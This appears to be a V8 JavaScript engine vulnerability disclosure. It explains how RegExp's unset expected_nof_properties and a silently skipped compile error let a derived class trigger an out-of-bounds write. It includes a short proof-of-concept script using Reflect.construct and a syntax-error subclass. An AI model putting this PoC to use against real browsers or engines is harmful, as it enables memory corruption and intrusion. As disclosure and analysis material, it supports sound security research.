|
/* Bug: The Genesis::InitializeGlobal method initializes the constructor of RegExp as follows: // Builtin functions for RegExp.prototype. Handle<JSFunction> regexp_fun = InstallFunction( global, "RegExp", JS_REGEXP_TYPE, JSRegExp::kSize + JSRegExp::kInObjectFieldCount * kPointerSize, JSRegExp::kInObjectFieldCount, factory->the_hole_value(), Builtins::kRegExpConstructor); InstallWithIntrinsicDefaultProto(isolate, regexp_fun, Context::REGEXP_FUNCTION_INDEX); Handle<SharedFunctionInfo> shared(regexp_fun->shared(), isolate); shared->SetConstructStub(*BUILTIN_CODE(isolate, JSBuiltinsConstructStub)); shared->set_instance_class_name(isolate->heap()->RegExp_string()); shared->set_internal_formal_parameter_count(2); shared->set_length(2); ... I think "shared->expected_nof_properties()" should be the same as JSRegExp::kInObjectFieldCount. But it doesn't set "expected_nof_properties", it remains 0. There are other constructors that don't set "expected_nof_properties", but RegExp was the only useable constructor to exploit. Exploit: This can affect JSFunction::GetDerivedMap, which is used to create or get a Map object for the given constructor and "new.target", to incorrectly compute the number of in-object properties. Here's a snippet of the method. (https://cs.chromium.org/chromium/src/v8/src/objects.cc?rcl=0c287882ea233f299a91f6b72b56d8faaecf52c0&l=12966) MaybeHandle<Map> JSFunction::GetDerivedMap(Isolate* isolate, Handle<JSFunction> constructor, Handle<JSReceiver> new_target) { ... // Fast case, new.target is a subclass of constructor. The map is cacheable // (and may already have been cached). new.target.prototype is guaranteed to // be a JSReceiver. if (new_target->IsJSFunction()) { Handle<JSFunction> function = Handle<JSFunction>::cast(new_target); ... // Create a new map with the size and number of in-object properties // suggested by |function|. // Link initial map and constructor function if the new.target is actually a // subclass constructor. if (IsDerivedConstructor(function->shared()->kind())) { Handle<Object> prototype(function->instance_prototype(), isolate); InstanceType instance_type = constructor_initial_map->instance_type(); DCHECK(CanSubclassHaveInobjectProperties(instance_type)); int embedder_fields = JSObject::GetEmbedderFieldCount(*constructor_initial_map); int pre_allocated = constructor_initial_map->GetInObjectProperties() - constructor_initial_map->UnusedPropertyFields(); int instance_size; int in_object_properties; CalculateInstanceSizeForDerivedClass(function, instance_type, embedder_fields, &instance_size, &in_object_properties); int unused_property_fields = in_object_properties - pre_allocated; Handle<Map> map = Map::CopyInitialMap(constructor_initial_map, instance_size, in_object_properties, unused_property_fields); ... return map; } } "unused_property_fields" is obtained by subtracting "pre_allocated" from "in_object_properties". And "in_object_properties" is obtained by adding the number of properties of "new_target" and its all super constructors using CalculateInstanceSizeForDerivedClass. Here's CalculateInstanceSizeForDerivedClass. void JSFunction::CalculateInstanceSizeForDerivedClass( Handle<JSFunction> function, InstanceType instance_type, int requested_embedder_fields, int* instance_size, int* in_object_properties) { Isolate* isolate = function->GetIsolate(); int expected_nof_properties = 0; for (PrototypeIterator iter(isolate, function, kStartAtReceiver); !iter.IsAtEnd(); iter.Advance()) { Handle<JSReceiver> current = PrototypeIterator::GetCurrent<JSReceiver>(iter); if (!current->IsJSFunction()) break; Handle<JSFunction> func(Handle<JSFunction>::cast(current)); // The super constructor should be compiled for the number of expected // properties to be available. Handle<SharedFunctionInfo> shared(func->shared()); if (shared->is_compiled() || Compiler::Compile(func, Compiler::CLEAR_EXCEPTION)) { DCHECK(shared->is_compiled()); expected_nof_properties += shared->expected_nof_properties(); } if (!IsDerivedConstructor(shared->kind())) { break; } } CalculateInstanceSizeHelper(instance_type, true, requested_embedder_fields, expected_nof_properties, instance_size, in_object_properties); } It iterates over all the super constructors, and sums each constructor's "expected_nof_properties()". If it fails to compile the constructor using Compiler::Compile due to somthing like a syntax error, it just clears the exception, and skips to the next iteration (Should this also count as a bug?). So using these, we can make "pre_allocated" higher than "in_object_properties" which may lead to OOB reads/writes. PoC: */ function gc() { for (let i = 0; i < 20; i++) new ArrayBuffer(0x2000000); } class Derived extends RegExp { constructor(a) { const a = 1; // syntax error, Derived->expected_nof_properties() skipped } } let o = Reflect.construct(RegExp, [], Derived); o.lastIndex = 0x1234; // OOB write gc(); /* int pre_allocated = constructor_initial_map->GetInObjectProperties() - // 1 constructor_initial_map->UnusedPropertyFields(); // 0 int instance_size; int in_object_properties; CalculateInstanceSizeForDerivedClass(function, instance_type, embedder_fields, &instance_size, &in_object_properties); // in_object_properties == 0, pre_allocated == 1 int unused_property_fields = in_object_properties - pre_allocated; Another bug? There's a comment saying "Fast case, new.target is a subclass of constructor." in the JSFunction::GetDerivedMap method, but it doesn't check that "new_target" is actually a subclass of "constructor". So if "new_target" is not a subclass of "constructor", "pre_allocated" can be higher than "in_object_properties". To exploit this, it required to be able to change the value of "constructor_initial_map->UnusedPropertyFields()", but I couldn't find any way. So I'm not so sure about this part. */
|
|
|